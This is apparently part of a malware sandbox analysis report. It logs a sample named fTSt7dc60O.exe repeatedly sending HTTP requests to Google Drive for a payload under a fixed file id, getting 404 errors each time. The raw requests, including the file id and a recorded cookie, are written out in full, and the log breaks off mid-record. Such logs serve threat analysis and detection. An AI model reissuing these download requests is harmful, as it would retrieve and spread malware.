                                                    2025-01-10 14:40:25 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 31 31 43 4e 37 61 68 4d 41 7a 56 47 73 4a 49 58 43 78 35 71 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="b11CN7ahMAzVGsJIXCx5qQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    72192.168.2.752257172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:26 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:27 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:27 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-1KKncOaVqLvXhWhawPvvFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    73192.168.2.752258142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:27 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:28 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgTBBergi_s54k7dUz975d3ixzRUK8TNFx8aKzjtZ2sRaKib5nquoehgflUCUTfplAuo
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:28 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-Dmo84NXbWAtznyBEhBK7TQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:28 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 6e 72 38 44 32 2d 52 52 78 50 48 63 75 6b 55 2d 74 43 47 75 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="enr8D2-RRxPHcukU-tCGuA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    74192.168.2.752259172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:29 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:29 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:29 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-yf1vyQEeZzLXkLkBsIKyQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    75192.168.2.752260142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:30 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:30 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6jyjbFgl1gbFUK4iRhij7444whM1hxRBhLWIo4H4OpzRGSuyM374RKBzIlJfs8wkx9
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:30 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-zHYg6pJBMH4ucdlT9rCToA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 34 54 2d 72 72 48 4b 5a 39 6b 73 2d 6a 63 58 70 58 64 61 61 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T4T-rrHKZ9ks-jcXpXdaag">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    76192.168.2.752261172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:31 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:32 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:31 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-yf1yxCIH2KwUU7kcquzE5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    77192.168.2.752262142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:32 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:33 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC4SLsGYiHjPz9MQVJJkoc26BLu4oYhKQquwdqkDK-wlscsZvDAuJdgoNE6H7ErPhPRuuXwXY64
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:32 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-laBNzsWtaoWMY9rnk9sxWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:33 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 46 6d 2d 53 36 4c 47 62 35 51 74 4b 57 69 71 4c 77 64 38 4c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZFm-S6LGb5QtKWiqLwd8Lw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    78192.168.2.752263172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:34 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:34 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:34 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-zxPubz3oR14HgR85QyahmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    79192.168.2.752264142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:35 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:35 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgTanNM34eTwf832VRdI7g2hcBWVzS6Mxm5pK_tkR-eCaa9_Di4DLVsJ4OLf-s2mjb-7
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:35 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
